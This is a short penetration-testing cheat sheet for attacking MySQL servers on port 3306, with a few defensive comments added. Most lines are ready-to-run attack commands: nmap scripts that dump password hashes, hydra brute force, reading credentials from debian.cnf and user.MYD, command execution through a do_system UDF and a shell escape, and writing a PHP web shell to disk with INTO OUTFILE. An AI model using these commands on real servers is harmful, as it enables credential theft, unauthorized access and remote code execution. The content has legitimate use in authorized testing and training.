# MYSQL - 3306
# Enumeration
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
# Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u
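# Extracting MySQL credentials from files
# (debian.cnf and the MySQL data directory should be readable only by root / the mysql user; user.MYD exists only where the grant tables are MyISAM, i.e. before MySQL 8.0)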
cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
# Connect
# Local
mysql -u <USER>
mysql -u <USER> -p
# Remote
mysql -h <IP> -u <USER>
# MySQL commands
show databases;
use <DATABASES>;
show tables;
describe <TABLE>;
select * from <TABLE>;
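# Try to execute code
# (do_system is not a built-in: it exists only if a UDF library providing it was loaded, so unexpected rows in mysql.func are worth alerting on; \! runs the command on the client machine, not on the server)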
select do_system('id');
\! sh
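# Read & Write
# (both need the FILE privilege and are confined by secure_file_priv: NULL disables them, a directory value limits them to that directory)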
select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>'
# Manual exploit
https://www.asafety.fr/mysql-injection-cheat-sheet/